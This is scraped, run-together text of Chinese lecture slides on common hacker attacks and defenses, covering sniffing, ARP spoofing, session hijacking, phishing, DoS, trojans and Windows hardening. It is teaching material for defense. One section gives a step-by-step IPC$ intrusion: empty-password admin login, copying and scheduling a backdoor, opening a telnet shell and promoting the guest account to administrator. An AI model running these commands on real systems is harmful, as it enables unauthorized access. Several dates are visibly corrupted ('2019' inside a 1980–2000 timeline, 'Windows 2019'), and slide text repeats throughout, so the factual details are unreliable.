《常见黑客攻击与防范课件.ppt》由会员分享,可在线阅读,更多相关《常见黑客攻击与防范课件.ppt(76页珍藏版)》请在三一办公上搜索。
1、常见黑客攻击与防范,绿盟科技 于慧龙,常见黑客攻击与防范绿盟科技 于慧龙,提纲,常见的黑客攻击方法常用的安全防范措施,提纲常见的黑客攻击方法,常见的黑客攻击方法,常见的黑客攻击方法,1980,1985,1990,2019,2000,密码猜测,可自动复制的代码,密码破解,利用已知的漏洞,破坏审计系统,后门,会话劫持,擦除痕迹,嗅探,包欺骗,GUI远程控制,自动探测扫描,拒绝服务,www 攻击,工具,攻击者,入侵者水平,攻击手法,半开放隐蔽扫描,控制台入侵,检测网络管理,DDOS 攻击,2019,高,入侵技术的发展,19801985199020192000密码猜测可自动复制的,采用漏洞扫描工具,选
2、择会用的方式入侵,获取系统一定权限,提升为最高权限,安装系统后门,获取敏感信息或者其他攻击目的,入侵系统的常用步骤,采用选择获取提安装获取敏感信息入侵系统的常用步骤,端口判断,判断系统,选择最简方式入侵,分析可能有漏洞的服务,获取系统一定权限,提升为最高权限,安装多个系统后门,清除入侵脚印,攻击其他系统,获取敏感信息,作为其他用途,较高明的入侵步骤,端口判断选择分析获取提安装清除攻击其获取敏作为其较高明的入侵,2019年中美黑客大战,事件背景和经过4.1撞机事件为导火线4月初,以PoizonB0 x、pr0phet为代表的美国黑客组织对国内站点进行攻击,约300个左右的站点页面被修改4月下旬,
3、国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了 “五一卫国网战”战前声明,宣布将在5月1日至8日,对美国网站进行大规模的攻击行动。各方都得到第三方支援各大媒体纷纷报道,评论,中旬结束大战,2019年中美黑客大战事件背景和经过,PoizonB0 x、pr0phet更改的网页,中经网数据有限公司,中国科学院心理研究所,国内某政府网站,国内某大型商业网站,PoizonB0 x、pr0phet更改的网页中经网数据有限公,国内黑客组织更改的网站页面,美国劳工部网站,美国某节点网站,美国某大型商业网站,美国某政府网站,国内黑客组织更改的网站页面美国劳工部网站美国某节点网
4、站美国某,这次事件中采用的常用攻击手法,红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下: “我们更多的是一种不满情绪的发泄,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系统, 这个行动在技术上是没有任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击,这次事件中采用的常用攻击手法红客联盟负责人在5月9日网上记者,这次事件中被利用的典型漏洞,用户名泄漏,缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名和密码 SQL server缺省安装微软Windows 2
5、000登录验证机制可被绕过 Bind 远程溢出,Lion蠕虫 SUN rpc.sadmind 远程溢出,sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞拒绝服务 (syn-flood , ping ),这次事件中被利用的典型漏洞用户名泄漏,缺省安装的系统用户名和,这次事件中被利用的典型漏洞,用户名泄漏,缺省安装的系统用户名和密码,入侵者,利用黑客工具扫描系统用户,获得用户名和简单密码,这次事件中被利用的典型漏洞用户名泄漏,缺省安装的系统用户名和,这次事件中被利用的典型漏洞,Windows 2000登录验证机制可被绕过,这次事件中被利用的典型漏洞Windows 2000登录验
6、证机,常见的安全攻击方法,直接获取口令进入系统:网络监听,暴力破解利用系统自身安全漏洞特洛伊木马程序:伪装成工具程序或者游戏等诱使用户打开或下载,然后使用户在无意中激活,导致系统后门被安装WWW欺骗:诱使用户访问纂改过的网页电子邮件攻击:邮件炸弹、邮件欺骗网络监听:获取明文传输的敏感信息通过一个节点来攻击其他节点:攻击者控制一台主机后,经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S),常见的安全攻击方法直接获取口令进入系统:网络监听,暴力破解,一次利用ipc$的入侵过程,1. C:net use x.x
7、.x.xIPC$ “” /user:“admintitrators” 用流光扫到的用户名是administrators,密码为“空”的IP地址2. C:copy srv.exe x.x.x.xadmin$ 先复制srv.exe上去,在流光的Tools目录下3. C:net time x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2019/3/19 上午 11:00,命令成功完成。4. C:at x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:net time x.x.x.x再查查时间到了没有,如果x.x.x.
8、x 的当前时间是 2019/3/19 上午 11:05,那就准备开始下面的命令。6. C:telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了,一次利用ipc$的入侵过程1. C:net use ,一次利用ipc$的入侵过程,7.C:copy ntlm.exe 127.0.0.1admin$ntlm.exe也在流光的Tools目录中8
9、. C:WINNTsystem32ntlm 输入ntlm启动(这里的C:WINNTsystem32是在对方计算机上运行当出现“DONE”的时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务)9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了为了方便日后登陆,将guest激活并加到管理组10. C:net user guest /active:yes 11. C:net user guest 1234 将Guest的密码改为123412. C:net localgroup administrators guest /add 将Guest
10、变为Administrator,一次利用ipc$的入侵过程7.C:copy ntlm.e,网络监听及防范技术,网络窃听是指通过截获他人网络上通信的数据流,并非法从中提取重要信息的一种方法间接性利用现有网络协议的一些漏洞来实现,不直接对受害主机系统的整体性进行任何操作或破坏隐蔽性网络窃听只对受害主机发出的数据流进行操作,不与主机交换信息,也不影响受害主机的正常通信,网络监听及防范技术网络窃听是指通过截获他人网络上通信的数据流,网络监听及防范技术共享式局域网下,共享式局域网采用的是广播信道,每一台主机所发出的帧都会被全网内所有主机接收到一般网卡具有以下四种工作模式:广播模式、多播模式、直接模式和混
11、杂模式网卡的缺省工作模式是广播模式和直接模式,即只接收发给自己的和广播的帧,网络监听及防范技术共享式局域网下共享式局域网采用,网络监听及防范技术共享式局域网下,使用MAC地址来确定数据包的流向若等于自己的MAC地址或是广播MAC地址,则提交给上层处理程序,否则丢弃此数据当网卡工作于混杂模式的时候,它不做任何判断,直接将接收到的所有帧提交给上层处理程序共享式网络下窃听就使用网卡的混杂模式,网络监听及防范技术共享式局域网下使用MAC地址来,网络监听及防范技术共享式局域网下,网络监听及防范技术共享式局域网下,网络监听及防范技术交换式局域网下,在数据链路层,数据帧的目的地址是以网卡的MAC地址来标识A
12、RP协议实现的配对寻址 ARP请求包是以广播的形式发出,正常情况下只有正确IP地址与的主机才会发出ARP响应包,告知查询主机自己的MAC地址。局域网中每台主机都维护着一张ARP表,其中存放着地址对。,网络监听及防范技术交换式局域网下在数据链路层,数,网络监听及防范技术交换式局域网下,ARP改向的中间人窃听,A发往B:(MACb,MACa,PROTOCOL,DATA)B发往A:(MACa,MACb,PROTOCOL,DATA),A发往B:(MACx,MACa,PROTOCOL,DATA)B发往A:(MACx,MACb,PROTOCOL,DATA),网络监听及防范技术交换式局域网下ARP改向的中间
13、,网络监听及防范技术交换式局域网下,X分别向A和B发送ARP包,促使其修改ARP表主机A的ARP表中B为主机B的ARP表中A为X成为主机A和主机B之间的“中间人”,网络监听及防范技术交换式局域网下X分别向A和B发,网络监听及防范技术网络窃听的被动防范,分割网段细化网络会使得局域网中被窃听的可能性减小 使用静态ARP表手工输入地址对 采用第三层交换方式取消局域网对MAC地址、ARP协议的依赖,而采用基于IP地址的交换加密SSH、SSL、IPSec,网络监听及防范技术网络窃听的被动防范 分割网段,网络监听及防范技术网络窃听的主动防范,共享式局域网下的主动防范措施伪造数据包构造一个含有正确目标IP地
14、址和一个不存在目标MAC地址各个操作系统处理方式不同,一个比较好的MAC地址是FF-FF-FF-FF-FF-FE性能分析向网络上发送大量包含无效MAC地址的数据包,窃听主机会因处理大量信息而导致性能下降,网络监听及防范技术网络窃听的主动防范共享式局域网下,网络监听及防范技术网络窃听的主动防范,交换式局域网下的主动防范措施监听ARP数据包 监听通过交换机或者网关的所有ARP数据包,与预先建立的数据库相比较 定期探测数据包传送路径 使用路径探测程序如tracert、traceroute等对发出数据包所经过的路径进行检查,并与备份的合法路径作比较使用SNMP定期轮询ARP表,网络监听及防范技术网络窃
15、听的主动防范交换式局域网下,IP欺骗及防范技术会话劫持,一般欺骗,会话劫持,IP欺骗及防范技术会话劫持一般欺骗会话劫持,IP欺骗及防范技术会话劫持,会话劫持攻击的基本步骤发现攻击目标确认动态会话猜测序列号关键一步,技术难点使被冒充主机下线伪造FIN包,拒绝服务攻击接管会话,IP欺骗及防范技术会话劫持会话劫持攻击的基本步,IP欺骗及防范技术会话劫持,猜测序列号TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号 选择恰当时间,在数据流中插入一个欺骗包,服务器将接受这个包,并且更新ACK序列号;然而客户主机仍继续使用老的SEQ序列号,而没有察觉我们的欺骗包,IP欺骗及防范技术会话劫持猜
16、测序列号,IP欺骗及防范技术防范技术,没有有效的办法可以从根本上防范会话劫持攻击所有会话都加密保护实现困难使用安全协议(SSH、VPN)保护敏感会话对网络数据流采取限制保护措施被动措施,IP欺骗及防范技术防范技术没有有效的办法可以从根本上防范,电子邮件欺骗及防范技术案例,2019年6月初,一些在中国工商银行进行过网上银行注册的客户,收到了一封来自网络管理员的电子邮件,宣称由于网络银行系统升级,要求客户重新填写用户名和密码。这一举动随后被工行工作人员发现,经证实是不法分子冒用网站公开信箱,企图窃取客户的资料。虽然没有造成多大的损失,但是这宗典型的电子邮件欺骗案例当时曾在国内安全界和金融界掀起了轩
17、然大波,刺激人们针对信息安全问题展开了更加深切的讨论。,电子邮件欺骗及防范技术案例2019年6月初,,电子邮件欺骗及防范技术原理,发送邮件使用SMTP(即简单邮件传输协议)SMTP协议的致命缺陷:过于信任原则SMTP假设的依据是:不怀疑邮件的使用者的身份和意图伪装成为他人身份向受害者发送邮件可以使用电子邮件客户端软件,也可以远程登录到25端口发送欺骗邮件,电子邮件欺骗及防范技术原理发送邮件使用SMT,电子邮件欺骗及防范技术防范,查看电子邮件头部信息不仅指出了是否有人欺骗了电子邮件,而且指出了这个信息的来源 采用SMTP身份验证机制使用与POP协议收取邮件时相同的用户名/密码PGP邮件加密以公钥
18、密码学(Public Key Cryptology) 为基础的,电子邮件欺骗及防范技术防范查看电子邮件头部信,Web欺骗及防范技术概念,人们利用计算机系统完成具有安全需求的决策时往往是基于屏幕的显示 页面、URL图标、图片时间的先后顺序攻击者创造一个完整的令人信服的Web世界,但实际上它却是一个虚假的复制 攻击者控制这个虚假的Web站点,受害者浏览器和Web之间所有网络通信完全被攻击者截获,Web欺骗及防范技术概念人们利用计算机系统完,Web欺骗及防范技术概念,Web欺骗及防范技术概念,Web欺骗及防范技术原理,URL地址改写dhshacker/dhs/攻击者改写Web页中的所有URL地址,使
19、它们指向攻击者的Web服务器不是真正的Web服务器,Web欺骗及防范技术原理URL地址改写,Web欺骗及防范技术原理,欺骗过程用户单击经过改写后的hacker/dhs/;hacker/向dhs/请求文档;dhs/向hacker/返回文档;hacker/改写文档中的所有URL;hacker/向用户返回改写后的文档,Web欺骗及防范技术原理欺骗过程,Web欺骗及防范技术原理,隐藏纰漏由于JavaScript能够对连接状态栏写操作,而且可以将JavaScript操作与特定事件绑定在一起。攻击者完全可以将改写的URL状态恢复为改写前的状态。JavaScript、ActiveX等技术使Web欺骗变得更为
20、可信。,Web欺骗及防范技术原理隐藏纰漏,Web欺骗及防范技术防范技术,检查页面的源代码禁用JavaScrip、ActiveX等脚本语言确保应用有效和能适当地跟踪用户会话ID 使用尽可能长的随机数教育是非常重要的,Web欺骗及防范技术防范技术检查页面的源代码,拒绝服务攻击(DoS),拒绝服务攻击(DoS)SYN (我可以连接吗?)ACK (可,DoS攻击技术DDoS技术,DoS攻击技术DDoS技术,特洛伊木马,木马不同于病毒,但经常被视作病毒处理,随计算机自动启动并在某一端口进行侦听;木马的实质只是一个通过端口进行通信的网络客户/服务程序特洛伊木马的种类远程控制型输出shell型信息窃取型其它
21、类型,特洛伊木马木马不同于病毒,但经常被视作病毒处理,随计算机自动,Netbus客户端程序,Netbus客户端程序,NetBus传输,NetBus使用TCP建立会话。缺省情况下用12345端口进行连接,12346端口进行数据传输跟踪NetBus的活动比较困难。可以通过检查12346端口数据来确定许多类似的程序使用固定的端口,你可以扫描整个的网络监测可疑的活动。简单方法netstat -an,NetBus传输 NetBus使用TCP建立会话。缺省情况下,反弹型特洛伊木马,可穿透防火墙,控制局域网机器服务器端主动发起连接,控制端监听80端口自动上线通知Email发送读取主页空间的某个文件网络神偷、
22、灰鸽子、魔法控制解决方法安装防病毒软件和个人防火墙检查可疑的进程和监听端口提高安全警惕性,反弹型特洛伊木马可穿透防火墙,控制局域网机器,网络神偷工作原理,连接方式服务器端主动发起连接到客户端80端口Server:1026 - Client:80服务端上线通知原理利用Email利用主页空间,网络神偷工作原理连接方式,网络神偷主界面,网络神偷主界面,网络神偷主界面,网络神偷主界面,TCP/IP的每个层次都存在攻击,TCP/IP的每个层次都存在攻击TelnetSMTPDNSF,混合型、自动的攻击,WorkstationVia Email,Workstation,Internet,混合型攻击:蠕虫,W
23、orkstation,攻击的发展趋势,混合型、自动的攻击 WorkstationFile Serv,攻击的发展趋势,漏洞趋势 严重程度中等或较高的漏洞急剧增加,新漏洞被利用越来越容易(大约60%不需或很少需用代码) 混合型威胁趋势将病毒、蠕虫、特洛伊木马和恶意代码的特性与服务器和 Internet 漏洞结合起来而发起、传播和扩散的攻击,例:红色代码和尼姆达等。 主动恶意代码趋势制造方法:简单并工具化 技术特征:智能性、攻击性和多态性,采用加密、变换、插入等技术手段巧妙地伪装自身,躲避甚至攻击防御检测软件.表现形式:多种多样,没有了固定的端口,没有了更多的连接,甚至发展到可以在网络的任何一层生根
24、发芽,复制传播,难以检测。受攻击未来领域即时消息:MSN,Yahoo,ICQ,OICQ等对等程序(P2P)移动设备,攻击的发展趋势漏洞趋势,常见的安全防范措施,常见的安全防范措施,常用的安全防范措施,物理层网络层路由交换策略VLAN划分防火墙、隔离网闸入侵检测抗拒绝服务传输加密系统层漏洞扫描系统安全加固SUS补丁安全管理应用层防病毒安全功能增强管理层独立的管理队伍统一的管理策略,常用的安全防范措施物理层,常用的安全防护措施防火墙,访问控制 加密常用的安全防护措施防火墙,入侵检测系统,Firewall,Servers,DMZ,Intranet,监控中心,router,攻击者,报警,报警,入侵检测
25、系统 FirewallInternetServer,漏洞扫描系统,地方网管,监控中心,地方网管,地方网管,漏洞扫描系统Internet地方网管scanner监控中心地,市场部,工程部,router,开发部,Servers,Firewall,漏洞扫描产品应用,市场部工程部router开发部InternetServers,拒绝服务攻击(DoS/DDoS),网络层SYN FloodICMP FloodUDP FloodPing of Death应用层垃圾邮件CGI资源耗尽,拒绝服务攻击(DoS/DDoS)网络层,企业级防病毒体系,集中管理多次防病毒体系,企业级防病毒体系集中管理,系统安全加固,基本安
26、全配置检测和优化密码系统安全检测和增强系统后门检测提供访问控制策略和工具增强远程维护的安全性文件系统完整性审计增强的系统日志分析系统升级与补丁安装,系统安全加固基本安全配置检测和优化,Windows系统安全加固,使用Windows update安装最新补丁;更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全;卸载不需要的服务;将暂时不需要开放的服务停止;限制特定执行文件的权限;设置主机审核策略;调整事件日志的大小、覆盖策略;禁止匿名用户连接;删除主机管理共享;限制Guest用户权限;安装防病毒软件、及时更新病毒代码库;安装个人
27、防火墙。,Windows系统安全加固使用Windows update安,Windows系统安全加固,使用Windows update安装最新补丁;更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全;将默认Administrator用户和组改名,禁用Guests并将Guest改名;开启安全审核策略;卸载不需要的服务;将暂时不需要开放的服务停止;限制特定执行文件的权限;调整事件日志的大小、覆盖策略;禁止匿名用户连接;删除主机管理共享;安装防病毒软件、个人防火墙。,Windows系统安全加固使用Windows update安,优化注
28、册表增强安全性,限制空连接HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParameters键值: RestrictNullSessAccess类型: REG_DWORD数值: 1限制来宾和空登陆身份查看事件日志HKEY_Local_MACHINESystemCurrentControlSetServicesEventLogApplication Security System键值:RestrictGuestAccess类型:REG_DWORD数值:1,优化注册表增强安全性限制空连接,优化注册表增强安全性,限制服务器显
29、示在网络列表中HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParameters键值: hidden类型: REG_DWORD数值: 1审核备份还原时间HKEY_Local_MACHINESystemCurrentControlSetControlLsa键值:FullPrivilegeAuditng类型:REG_DWORD数值:1,优化注册表增强安全性限制服务器显示在网络列表中,优化注册表增强安全性,不显示最后登陆名HKEY_Local_MACHINESoftwareMicrosoftWindowsNTCurrentV
30、ersionWinlogon键值: DontDisplayLastUserName类型: REG_SZ数值: 1限制匿名用户列举用户和共享信息HKEY_Local_MACHINESystemCurrentControlSetControlLsa键值:RestrictAnonymous类型:REG_DWORD数值:1,优化注册表增强安全性不显示最后登陆名,优化注册表增强安全性,删除为管理员而设计的共享(C$,ADMIN$)键值:AutoShareServer类型:REG_DWORD数值:1,优化注册表增强安全性删除为管理员而设计的共享(C$,ADMI,补丁安全管理(SUS),英文全名叫“SOFT
31、WARE UPDATE SERVICES ”SUS可以用于Windows2000、XP以及.Net等系统的关键性更新任务。参见SUS系统架构服务。,补丁安全管理(SUS)英文全名叫“SOFTWARE UPDA,SUS系统的部署,软硬件需求服务器硬件需求(推荐配置)CPU:Pentium III 700或更高内存:512MB或更高硬盘:6GB空余空间或更高网卡:100M网卡或更高软件需求Windows 2000或Windows 2019操作系统IIS 5.0或IIS 6.0能够正常访问Internet客户端硬件需求(无特殊要求)软件需求Windows 2000 SP2以上、Windows XP、
32、Windows 2019,SUS系统的部署软硬件需求,SUS系统的部署,SUS安装从微软获取SUS软件包和SUS补丁程序安装SUS软件和SUS补丁程序,SUS系统的部署SUS安装,SUS系统的部署,SUS服务端配置访问 /SUSAdmin代理服务器配置配置DNS名称和NetBIOS名称,并且在DNS服务器上作相应修改选择下载补丁的源选择要下载的补丁程序语言版本,SUS系统的部署SUS服务端配置,SUS系统的部署,SUS的日常管理补丁程序同步管理自动同步手动同步发布补丁,SUS系统的部署SUS的日常管理,SUS系统的部署,SUS的日常管理发布补丁程序,SUS系统的部署SUS的日常管理,SUS系统的部署,服务器运行状态监控补丁同步日志补丁发布日志系统监视补丁分发日志,SUS系统的部署服务器运行状态监控,SUS系统的部署,SUS客户端的配置域环境中修改组策略工作组环境中使用定制升级页面,SUS系统的部署SUS客户端的配置,SUS系统的部署,SUS用户体验,SUS系统的部署SUS用户体验,Q&A,Q&A,
